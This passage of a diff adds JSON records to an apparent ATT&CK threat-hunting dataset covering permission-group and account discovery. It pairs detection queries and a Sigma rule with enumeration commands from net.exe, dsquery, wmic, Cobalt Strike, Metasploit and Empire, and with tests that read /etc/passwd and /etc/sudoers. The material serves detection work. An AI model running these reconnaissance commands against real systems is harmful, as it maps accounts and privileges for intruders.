accounts on the workstation " + }, + { + "Category": "T1069", + "Built-in Windows Command": "net group [\"Domain Admins\"] /domain[:DOMAIN] ", + "Cobalt Strike": "net group [\"Domain Admins\"] /domain", + "Metasploit": "domain_list_gen.rb\npost/windows/gather/enum_domain_group_users", + "Description": "Display the list of domain administrator accounts" + }, + { + "Empire Module": "powershell/situational_awareness/host/get_pathacl", + "ATT&CK Technique #1": "T1069", + "ATT&CK Technique #2": "", + "Technique": "Permission Groups Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/get_pathacl\": [\"T1069\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_object_acl", + "ATT&CK Technique #1": "T1069", + "ATT&CK Technique #2": "", + "Technique": "Permission Groups Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_object_acl\": [\"T1069\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/map_domain_trust", + "ATT&CK Technique #1": "T1069", + "ATT&CK Technique #2": "", + "Technique": "Permission Groups Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/map_domain_trust\": [\"T1069\"]," + }, + { + "Empire Module": "powershell/situational_awareness/host/get_uaclevel", + "ATT&CK Technique #1": "T1069", + "ATT&CK Technique #2": "", + "Technique": "Permission Groups Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/get_uaclevel\": [\"T1069\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where process_path contains \"net\"and (file_directory contains \"user\"or file_directory contains \"group\"or file_directory contains \"localgroup\")", + "name": "Permission Groups Discovery" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"net.exe\"and (process_command_line contains \"*net* user*\"or process_command_line contains \"*net* group*\"or process_command_line contains \"*net* localgroup*\"or process_command_line contains \"*get-localgroup*\"or process_command_line contains \"*get-ADPrinicipalGroupMembership*\")", + "name": "Permission Groups Discovery Process" + } + ], + "possible_detections": [ + { + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "experimental", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "references": [ + "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html" + ], + "author": "Florian Roth (rule), Jack Croock (method)", + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1069", + "attack.s0039" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "The volume of Event ID 4661 is high on Domain Controllers and therefore \"Audit SAM\" and \"Audit Kernel Object\" advanced audit policy settings are not configured in the recommendations for server systems" + }, + "detection": { + "selection": [ + { + "EventID": 4661, + "ObjectType": "SAM_USER", + "ObjectName": "S-1-5-21-*-500", + "AccessMask": "0x2d" + }, + { + "EventID": 4661, + "ObjectType": "SAM_GROUP", + "ObjectName": "S-1-5-21-*-512", + "AccessMask": "0x2d" + } + ], + "condition": "selection" + }, + "falsepositives": [ + "Administrator activity", + "Penetration tests" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group enumeration", + "description": "A group was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "group" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group metadata", + "description": "Data and information that describe a group and activity around it such as group permissions.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "group" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1087", + "command_list": [ + "net user [username] [/domain]", + "shell net user [username] [/domain]", + "post/windows/gather/enum_ad_users\nauxiliary/scanner/smb/smb_enumusers", + "dsquery group \"ou=Domain Admins,dc=domain,dc=com\"\ndsquery user \"dc=domain,dc=com\"\ndsquery * OU=\"Domain Admins\",DC=domain,DC=com -scope base -attr SAMAccountName userPrincipalName Description\ndsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\ndsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "shell dsquery group \"out=Domain Admins\",dc=domain,dc=com\"\nshell dsquery user \"dc=domain,dc=com\"\nshell dsquery * OU=\"Domain Admins\",dc=domain,dc=com -scope base -attr SAMAccountName userPrincipleName Description\nshell dsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\nshell dsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "Net.exe localgroup \"administrators\"", + "Net.exe group \"domain admins\" /domain", + "Net.exe user * /domain", + "wmic.exe useraccount get /ALL", + "wmic.exe useraccount list", + "wmic.exe qfe get description,installedOn /format:csv", + "wmic.exe process get caption,executablepath,commandline", + "wmic.exe service get name,displayname,pathname,startmode", + "wmic.exe share list", + "wmic.exe /node:\"192.168.0.1\" service where (caption like \"%sql server (%\")", + "wmic.exe get-wmiobject -class \"win32_share\" -namespace \"root\\CIMV2\" -computer \"targetname\"", + "nltest.exe", + "powershell/management/get_domain_sid", + "powershell/management/sid_to_user", + "powershell/management/user_to_sid", + "powershell/situational_awareness/network/get_spn", + "powershell/situational_awareness/network/powerview/find_foreign_group", + "powershell/situational_awareness/network/powerview/find_foreign_user", + "powershell/situational_awareness/network/powerview/find_gpo_computer_admin", + "powershell/situational_awareness/network/powerview/find_gpo_location", + "powershell/situational_awareness/network/powerview/find_localadmin_access", + "powershell/situational_awareness/network/powerview/find_managed_security_group", + "powershell/situational_awareness/network/powerview/get_gpo_computer", + "powershell/situational_awareness/network/powerview/get_group", + "powershell/situational_awareness/network/powerview/get_group_member", + "powershell/situational_awareness/network/powerview/get_localgroup", + "powershell/situational_awareness/network/powerview/get_loggedon", + "powershell/situational_awareness/network/powerview/get_ou", + "powershell/situational_awareness/network/powerview/get_user", + "powershell/situational_awareness/network/powerview/user_hunter", + "python/situational_awareness/network/active_directory/dscl_get_groupmembers", + "python/situational_awareness/network/active_directory/dscl_get_groups", + "python/situational_awareness/network/active_directory/dscl_get_users", + "python/situational_awareness/network/active_directory/get_groupmembers", + "python/situational_awareness/network/active_directory/get_groupmemberships", + "python/situational_awareness/network/active_directory/get_groups", + "python/situational_awareness/network/active_directory/get_ous", + "python/situational_awareness/network/active_directory/get_userinformation", + "python/situational_awareness/network/active_directory/get_users", + "Atomic Test #1 - Enumerate all accounts", + "cat /etc/passwd > #{output_file}", + "Atomic Test #2 - View sudoers access", + "cat /etc/sudoers > #{output_file}", + "Atomic Test #3 - View accounts with UID 0", + "username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username", + "lsof $USER", + "Atomic Test #4 - Show if a user account has ever logger in remotely", + "lastlog > #{output_file}", + "Atomic Test #5 - Enumerate users and groups", + "groups", + "id" + ], + "commands": [ + { + "command": "net user [username] [/domain]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net user [username] [/domain]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/enum_ad_users\nauxiliary/scanner/smb/smb_enumusers", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "dsquery group \"ou=Domain Admins,dc=domain,dc=com\"\ndsquery user \"dc=domain,dc=com\"\ndsquery * OU=\"Domain Admins\",DC=domain,DC=com -scope base -attr SAMAccountName userPrincipalName Description\ndsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\ndsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell dsquery group \"out=Domain Admins\",dc=domain,dc=com\"\nshell dsquery user \"dc=domain,dc=com\"\nshell dsquery * OU=\"Domain Admins\",dc=domain,dc=com -scope base -attr SAMAccountName userPrincipleName Description\nshell dsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\nshell dsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Net.exe localgroup \"administrators\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe group \"domain admins\" /domain", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe user * /domain", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe useraccount get /ALL", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe useraccount list", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe qfe get description,installedOn /format:csv", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe process get caption,executablepath,commandline", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe service get name,displayname,pathname,startmode", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe share list", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe /node:\"192.168.0.1\" service where (caption like \"%sql server (%\")", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "wmic.exe get-wmiobject -class \"win32_share\" -namespace \"root\\CIMV2\" -computer \"targetname\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "nltest.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell/management/get_domain_sid", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/sid_to_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/user_to_sid", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/get_spn", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_foreign_group", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_foreign_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_gpo_computer_admin", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_gpo_location", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_localadmin_access", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/find_managed_security_group", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_gpo_computer", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_group", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_group_member", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_localgroup", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_loggedon", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_ou", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_user", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/user_hunter", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/dscl_get_groupmembers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/dscl_get_groups", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/dscl_get_users", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_groupmembers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_groupmemberships", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_groups", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_ous", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_userinformation", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_users", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "Atomic Test #1 - Enumerate all accounts", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cat /etc/passwd > #{output_file}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "Atomic Test #2 - View sudoers access", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cat /etc/sudoers > #{output_file}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "Atomic Test #3 - View accounts with UID 0", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "lsof $USER", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "Atomic Test #4 - Show if a user account has ever logger in remotely", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "lastlog > #{output_file}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "Atomic Test #5 - Enumerate users and groups", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "groups", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "id", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "Category": "T1087", + "Built-in Windows Command": "net user [username] [/domain]", + "Cobalt Strike": "shell net user [username] [/domain]", + "Metasploit": "post/windows/gather/enum_ad_users\nauxiliary/scanner/smb/smb_enumusers", + "Description": "Used to add, delete, and manage the users on the computer. Run this command on the users discovered from the previous two commands to gather more information on targeted users." + }, + { + "Category": "T1087", + "Built-in Windows Command": "dsquery group \"ou=Domain Admins,dc=domain,dc=com\"\ndsquery user \"dc=domain,dc=com\"\ndsquery * OU=\"Domain Admins\",DC=domain,DC=com -scope base -attr SAMAccountName userPrincipalName Description\ndsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\ndsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "Cobalt Strike": "shell dsquery group \"out=Domain Admins\",dc=domain,dc=com\"\nshell dsquery user \"dc=domain,dc=com\"\nshell dsquery * OU=\"Domain Admins\",dc=domain,dc=com -scope base -attr SAMAccountName userPrincipleName Description\nshell dsquery * -filter \"(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))\" -Attr samAccountName mail -Limit 0\nshell dsquery * -filter \"(&(objectCategory=group)(name=*Admin*))\" -Attr name description members", + "Metasploit": "", + "Description": "Dsquery is a Windows utility on servers that facilitates querying the Active Directory of the domain for lots of information about users, groups, and permissions. When constructing dsquery commands, if your domain is \"subdomain.domain.tld\", then your query will include \"dc=subdomain,dc=domain,dc=tld\"" + }, + { + "chain_id": "100137", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "localgroup \"administrators\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100138", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "group \"domain admins\" /domain", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100139", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "user * /domain", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100140", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "useraccount get /ALL", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100141", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "useraccount list", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100142", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "qfe get description,installedOn /format:csv", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100143", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "process get caption,executablepath,commandline", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100144", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "service get name,displayname,pathname,startmode", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100145", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "share list", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100146", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "/node:\"192.168.0.1\" service where (caption like \"%sql server (%\")", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100147", + "os": "windows", + "parent_process": "wmic.exe", + "commandline_string": "get-wmiobject -class \"win32_share\" -namespace \"root\\CIMV2\" -computer \"targetname\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "" + }, + { + "chain_id": "100215", + "os": "windows", + "parent_process": "nltest.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "account_discovery", + "mitre_attack": "T1087", + "itw_sample": "https://www.hybrid-analysis.com/sample/43bc3efd795f4a1e84f9017f6b39ab331614665b4998e6c806dc8d0417ec314f?environmentId=100" + }, + { + "Empire Module": "powershell/management/get_domain_sid", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/management/get_domain_sid\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/management/sid_to_user", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/management/sid_to_user\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/management/user_to_sid", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/management/user_to_sid\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/get_spn", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/get_spn\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_foreign_group", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_foreign_group\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_foreign_user", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_foreign_user\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_gpo_computer_admin", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_gpo_computer_admin\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_gpo_location", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_gpo_location\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_localadmin_access", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_localadmin_access\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/find_managed_security_group", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/find_managed_security_group\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_gpo_computer", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_gpo_computer\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_group", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_group\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_group_member", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_group_member\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_localgroup", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_localgroup\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_loggedon", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "T1033", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_loggedon\": [\"T1087\",\"T1033\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_ou", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": "Account Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_ou\": [\"T1087\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_user", + "ATT&CK Technique #1": "T1087", + "ATT&CK Technique #2": "", + "Technique": 